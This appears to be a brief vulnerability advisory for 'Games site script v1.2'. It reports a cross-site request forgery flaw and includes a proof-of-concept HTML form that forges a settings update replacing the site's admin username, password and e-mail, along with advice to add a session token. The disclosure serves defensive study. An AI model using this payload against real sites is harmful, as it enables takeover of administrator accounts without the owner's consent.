< ------------------- header data start ------------------- >

#############################################################

# Application Name : Games site script v1.2

# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)

# Infection : Admin sifresi degistirilebilir ..! [EN: the admin password can be changed]

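# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir ! [EN: a session key (session token) must be added to the form, i.e. an unpredictable per-session value that the server verifies before it applies the settings update]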

# Demo : http://games.sourceworkshop.com/admin/

# author : CWCaspeR ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<!--
  Proof-of-concept form from the advisory. It sends a POST request to the admin
  settings handler (admin/index.php) of the affected script.
  hedefsite.com, KULLANICIADI, SIFRE and BUTONADI are the author's Turkish
  placeholders ("target site", "username", "password", "button label"), not real values.
  Defender's reading: every field below is a fixed, predictable name/value pair.
  No per-session token field and no current-password field appear in the request.
  The server therefore has nothing in it to tell a deliberate admin action from a
  forged cross-site one. Presumably it relies on the admin's session cookie alone;
  confirm against the application.
  The typographic quotes are left as printed; they are likely a publishing artefact.
-->
<form action=’http://hedefsite.com/admin/index.php’ method=POST>
<!-- command=settings with param=update: the pair that selects the settings update action -->
<input type=’hidden’ name=’command’ value=’settings’>
<input type=’hidden’ name=’param’ value=’update’>
<!-- Admin account fields; this is the state change the advisory reports (admin credentials can be replaced) -->
<input readonly value=’KULLANICIADI’ class=’field’ name=’admin_user_name’ type=hidden size=25>
<input readonly value=’SIFRE’ class=’field’ name=’admin_password’ type=hidden size=25>
<!-- The e-mail value below appears to have been masked by the hosting page's e-mail obfuscation; the original is not recoverable from here -->
<input readonly value=’[email protected]’ class=’field’ name=’admin_email’ type=hidden size=45>
<!-- Remaining settings fields sent with the same request; "thubnail" is spelled as printed in the advisory -->
<input value=’45’ class=’field’ name=’thubnail_width’ type=hidden size=5>
<input value=’45’ class=’field’ name=’thubnail_height’ type=hidden size=5>
<!-- Submit control; the closing td/tr tags have no matching opening tags in this snippet -->
<input name=’save’ value=’BUTONADI’ class=’button’ type=submit ></td></tr>
</form>

< -- bug code end of -- >